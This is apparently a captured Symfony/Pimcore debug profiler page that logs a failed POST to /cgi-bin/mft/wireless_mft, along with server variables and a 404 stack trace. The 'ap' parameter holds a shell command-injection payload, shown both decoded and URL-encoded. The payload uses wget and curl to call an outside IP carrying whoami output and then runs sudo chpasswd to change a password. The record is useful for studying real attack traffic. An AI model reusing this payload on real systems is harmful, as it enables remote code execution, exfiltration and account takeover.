http://185.213.27.223/cgi-bin/mft/wireless_mft

n/a

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
ap
"ap=$(wget http://193.111.248.148:5005/$(whoami)$(echo whoami)/; -O /tmp/file; curl http://193.111.248.148:5005/$(whoami); echo "$(whoami):wefuwefdjifiuwe" | sudo chpasswd)"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_editmode
false
_pimcore_context
"default"
_pimcore_frontend_request
true
_remove_csp_headers
true
_stopwatch_token
"d5d4f5"

Request Headers

Header Value
accept-encoding
"gzip"
content-length
"246"
content-type
"application/x-www-form-urlencoded"
host
"185.213.27.223"
user-agent
"Go-http-client/1.1"
x-php-ob-level
"1"

Request Content

Raw

ap=ap%3D%24%28wget+http%3A%2F%2F193.111.248.148%3A5005%2F%24%28whoami%29%24%28echo+whoami%29%2F%3B+-O+%2Ftmp%2Ffile%3B+curl+http%3A%2F%2F193.111.248.148%3A5005%2F%24%28whoami%29%3B+echo+%22%24%28whoami%29%3Awefuwefdjifiuwe%22+%7C+sudo+chpasswd%29

Response

Response Headers

Header Value
cache-control
"private, must-revalidate"
content-language
"en"
content-type
"text/html; charset=UTF-8"
date
"Sun, 29 Sep 2024 01:19:22 GMT"
expires
"Tue, 01 Jan 1980 00:00:00 GMT"
pragma
"no-cache"
x-debug-exception
"No%20route%20found%20for%20%22POST%20http%3A%2F%2F185.213.27.223%2Fcgi-bin%2Fmft%2Fwireless_mft%22"
x-debug-exception-file
"%2Fvar%2Fwww%2Fpimcore%2FMovieCollection%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135"
x-debug-token
"570c9d"
x-debug-token-link
"http://185.213.27.223/_profiler/48ede8"
x-powered-by
"pimcore"
x-previous-debug-token
"48ede8"
x-robots-tag
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"246"
CONTENT_TYPE
"application/x-www-form-urlencoded"
DOCUMENT_ROOT
"/var/www/pimcore/MovieCollection/public"
DOCUMENT_URI
"/index.php"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/var/www"
HTTP_ACCEPT_ENCODING
"gzip"
HTTP_CONTENT_LENGTH
"246"
HTTP_CONTENT_TYPE
"application/x-www-form-urlencoded"
HTTP_HOST
"185.213.27.223"
HTTP_USER_AGENT
"Go-http-client/1.1"
PATH_INFO
""
PHP_SELF
"/index.php"
QUERY_STRING
""
REDIRECT_STATUS
"200"
REMOTE_ADDR
"172.105.246.56"
REMOTE_PORT
"38480"
REMOTE_USER
""
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"http"
REQUEST_TIME
1727572762
REQUEST_TIME_FLOAT
1727572762.1018
REQUEST_URI
"/cgi-bin/mft/wireless_mft"
SCRIPT_FILENAME
"/var/www/pimcore/MovieCollection/public//index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"185.213.27.223"
SERVER_NAME
"moviecollection"
SERVER_PORT
"80"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"nginx/1.18.0"
SYMFONY_DOTENV_VARS
"APP_ENV"
USER
"www-data"

Sub Requests 1

ErrorController (token = 48ede8)

Key Value
_controller
"error_controller"
_editmode
false
_pimcore_context
"default"
_stopwatch_token
"ddd6bb"
exception
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#1876
  #message: "No route found for "POST http://185.213.27.223/cgi-bin/mft/wireless_mft""
  #code: 0
  #file: "/var/www/pimcore/MovieCollection/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 135
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#1873 …}
  -statusCode: 404
  -headers: []
  trace: {
    /var/www/pimcore/MovieCollection/vendor/symfony/http-kernel/EventListener/RouterListener.php:135 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /var/www/pimcore/MovieCollection/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:117 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);}
    /var/www/pimcore/MovieCollection/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/pimcore/MovieCollection/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/pimcore/MovieCollection/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /var/www/pimcore/MovieCollection/vendor/symfony/http-kernel/HttpKernel.php:128 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/pimcore/MovieCollection/vendor/symfony/http-kernel/HttpKernel.php:74 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
    }
    /var/www/pimcore/MovieCollection/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/pimcore/MovieCollection/public/index.php:36 {
      › 
      › $response = $kernel->handle($request);$response->send();
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#344 …8}